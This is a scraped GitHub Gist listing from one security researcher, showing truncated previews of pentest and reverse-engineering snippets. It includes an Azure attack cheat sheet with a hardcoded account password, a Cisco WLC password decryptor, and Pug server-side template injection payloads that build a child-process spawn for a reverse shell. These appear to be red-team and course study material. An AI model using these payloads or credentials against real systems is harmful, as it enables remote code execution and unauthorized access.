Setup Port forwarding on the debugged machine:
ssh student@atutor
echo -e "\nGatewayPorts yes \n" | sudo tee -a /etc/ssh/sshd_config && sudo service sshd restart
Set up proxy Server on the Kali VM/VPN machine :
Jasem Al-Sadi Jasemalsadi
Jasemalsadi
/ commands.ps1
Created
April 22, 2024 09:53
Azure PT commands cheat sheet, from both CARTP and CARTE courses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Connect | |
| $passwd = ConvertTo-SecureString "NewUserSSecret@Pass61" -AsPlainText -Force | |
| $creds = New-Object System.Management.Automation.PSCredential ("AS-5945632460@oilcorptarsands.onmicrosoft.com", $passwd) | |
| Connect-AzAccount -Credential $creds | |
| #Connect-AzureAD -Credential $creds | |
| Connect-MgGraph -ClientSecretCredential $creds -TenantId bcdc6c96-4f80-4b10-8228-2e6477c71851 | |
| ## 1. Unauthenticated Recon: | |
| #Get if Azure tenant is in use, tenant name and Federation | |
| https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME@DOMAIN]&xml=1 |
Jasemalsadi
/ opcodeFinder.js
Last active
January 28, 2024 08:52
Opcode finder; quick and dirty JS script to parse decompiled IDA code to track certain variable and it's alisase usage in the code,doesn't support nested switch statment but will alert you when there is, doesn't accurtely find end of the switch statement
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const codeLines = `// Your decompiled C code here | |
| HIWORD(v4) = HIWORD(memcpyDst0); | |
| if (memcpyDst0[3] != 0x1090 && memcpyDst0[3] != 0x903 && memcpyDst0[3] != 0x508) { | |
| ... | |
| }` | |
| trackOpCode(codeLines,'memcpyDst0[3]') | |
| /* output sample | |
| Line 625: *(_DWORD *)(JavaClientInfo + 4 * *(_DWORD *)(JavaClientInfo + 1173160) + 1172360) = memcpyDst0[3]; | |
| Line 683: if ( memcpyDst0[3] != 0x1090 && memcpyDst0[3] != 0x903 && memcpyDst0[3] != 0x508 ) | |
| Line 686: if ( memcpyDst0[3] != 0x1070 && memcpyDst0[3] != 0x514 && memcpyDst0[3] != 0x521 ) |
Jasemalsadi
/ a.js
Created
November 25, 2023 08:02
Windbg JS script to print all calls as json tree structure to easily view it, call only trace_calls function
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //"use strict"; | |
| var addrresses_we_return_to = []; | |
| class CallTreeNode { | |
| constructor(name, address,is_outside_exedll=false) { | |
| this.name = name; | |
| this.address = address; | |
| this.is_outside_exedll = is_outside_exedll | |
| this.children = []; | |
| } |
Jasemalsadi
/ shellcodeCatcher.js
Created
October 10, 2023 19:36
Windbg JS function to break when any cmp or test instruction comparing our input buffer (e.g. 4141)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function find_cmp_use_shellcode(patternsArg) { | |
| /* | |
| .scriptrun c:\scripts\debug.js | |
| bp 0056C4B6 | |
| bp 0056c850 | |
| g | |
| dx .State.Scripts.debug.Contents.find_cmp_use_shellcode("4141,4242,4432") | |
| */ | |
| var patterns = patternsArg.split(",") | |
| if (patterns === null || patterns.length==0) { |
Jasemalsadi
/ decrypt_WLC.html
Created
November 3, 2022 21:04
HTML Script to automate decrypting passwords of any CISCO WLC config dump you might find during RT engagements . Anything with password 1 encryption.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <!-- <script src="script.js"></script> --> | |
| <!-- Crypto JS library --> | |
| <script> | |
| !function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,r,e,l,i,n,o,t,s,a,f,c,d,H,u,p,_,y,v,g,B,m,x,b,z,A,C,w,k,S,D,R,E,M,F,P,W,O,U,I,K,et,rt,X,L,j,N,T,Z,q,G,J,$,Q,V,Y,tt,it,nt,ot,st,ct,at,ht,lt,ft=ft||(h=Math,r=Object.create||function(t){return dt.prototype=t,t=new dt,dt.prototype=null,t},ot=(st={}).lib={},e=ot.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=ot.WordArra |
Jasemalsadi
/ GPOSearcher.html
Last active
November 15, 2022 08:19
Using Grouper3 output, we can search for certain text in the each GPO , for example, any usage for allowunencryptedTraffic
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <!-- <script src="script.js"></script> --> | |
| </head> | |
| <body> | |
| <h1> GPO Pattern Searcher </h1> | |
| <p> Choose the GPO path file and text pattern to search for </p> | |
| <form name="myForm" onsubmit="return FindThePattern(true)"> |
Jasemalsadi
/ GetSectionHdrByName.c
Last active
January 29, 2022 09:01
Get a section header address by only the name of the section
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define IMAGE_FIRST_SECTION(ntheader) \ | |
| ((PIMAGE_SECTION_HEADER)(ULONG_PTR)((const BYTE *)&((const IMAGE_NT_HEADERS *)(ntheader))->OptionalHeader + \ | |
| ((const IMAGE_NT_HEADERS *)(ntheader))->FileHeader.SizeOfOptionalHeader)) | |
| // IMAGE_FIRST_SECTION = Pointer to the starting point of optional header “OPTHDROFFSET macro” + SizeOfOptionalHeader which exist in the image file header struct. | |
| BOOL WINAPI GetSectionHdrByName ( | |
| LPVOID lpFile, // pointer to the file | |
| IMAGE_SECTION_HEADER *sh, // returned pointer to the section header | |
| char *szSection // name of the section to find it. |
Jasemalsadi
/ ssti_rev_shell_pug_node_js
Created
February 16, 2021 08:33
SSTI reverse shell for pug template engine Node js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| h1= title | |
| p Welcome to #{3*3} | |
| #{spawn_sync = this.process.binding('spawn_sync')} | |
| #{ normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}} | |
| #{spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}conso |
Jasemalsadi
/ rev_shell_SSTI_perl
Created
February 16, 2021 08:32
mutli line perl reverse shell one node js template injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| spawn_sync = this.process.binding('spawn_sync') | |
| normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};} | |
| // Defines spawnSync, the function that will do the actual spawning | |
| spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buff |
Jasemalsadi
/ remote_debugging_phpstrom.md
Last active
April 21, 2023 03:33
PHPSTORM remote debugging with pivoting for OSWE Web Apps
NewerOlder